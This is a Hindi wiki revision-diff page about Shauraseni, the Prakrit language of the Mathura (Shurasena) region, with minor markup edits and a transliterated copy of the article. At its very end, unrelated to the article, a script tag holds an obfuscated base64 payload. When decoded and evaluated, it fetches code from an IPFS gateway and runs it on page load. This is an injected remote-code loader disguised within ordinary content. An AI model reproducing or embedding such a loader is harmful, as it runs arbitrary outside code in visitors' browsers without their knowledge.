Difference between revisions of "शौरसेनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*600 ई.पू. से लेकर 1000 ई0 सन् तक उत्तर [[भारत]] में जो भाषाएं बोली जाती थीं, उनका सामान्य नाम [[प्राकृत भाषा|प्राकृत]] था।  
+
*600 ई.पू. से लेकर 1000 ई. सन् तक उत्तर [[भारत]] में जो भाषाएं बोली जाती थीं, उनका सामान्य नाम [[प्राकृत भाषा|प्राकृत]] था।  
 
*किंतु प्रदेश-भेद से इनके अलग-अलग नाम पड़े।  
 
*किंतु प्रदेश-भेद से इनके अलग-अलग नाम पड़े।  
 
*उस समय [[मथुरा]] और उसके आसपास का क्षेत्र [[शूरसेन]] कहलाता था।  
 
*उस समय [[मथुरा]] और उसके आसपास का क्षेत्र [[शूरसेन]] कहलाता था।  
 
*इसे मध्यदेश भी कहते थे।  
 
*इसे मध्यदेश भी कहते थे।  
 
*यहाँ बोली जानेवाली भाषा शौरसेनी कहलाती थी।  
 
*यहाँ बोली जानेवाली भाषा शौरसेनी कहलाती थी।  
*अन्य क्षेत्रीय रूप थे- पूर्वदेश की मागधी अथवा अर्धमागधी और पश्चिमौत्तर प्रदेश की पैशाची।
+
*अन्य क्षेत्रीय रूप थे- पूर्वदेश की मागधी अथवा [[अर्ध मागधी]] और पश्चिमौत्तर प्रदेश की [[पैशाची भाषा|पैशाची]]।
 
*[[अशोक]] के समय के प्राचीन लेखों में इन्हीं प्राकृतों, विशेषत: शौरसेनी का प्रयोग पाया जाता है।
 
*[[अशोक]] के समय के प्राचीन लेखों में इन्हीं प्राकृतों, विशेषत: शौरसेनी का प्रयोग पाया जाता है।
  
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:भाषा और लिपि]]
+
[[Category:भाषा और लिपि]][[Category:इतिहास कोश]][[Category:ब्रज]]
[[Category:इतिहास कोश]]
 
[[Category:ब्रज]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 10:01, 4 November 2014

  • 600 ee.poo. se lekar 1000 ee. sanh tak uttar bharat mean jo bhashaean boli jati thian, unaka samany nam prakrit tha.
  • kiantu pradesh-bhed se inake alag-alag nam p de.
  • us samay mathura aur usake asapas ka kshetr shoorasen kahalata tha.
  • ise madhyadesh bhi kahate the.
  • yahaan boli janevali bhasha shauraseni kahalati thi.
  • any kshetriy roop the- poorvadesh ki magadhi athava ardh magadhi aur pashchimauttar pradesh ki paishachi.
  • ashok ke samay ke prachin lekhoan mean inhian prakritoan, visheshat: shauraseni ka prayog paya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>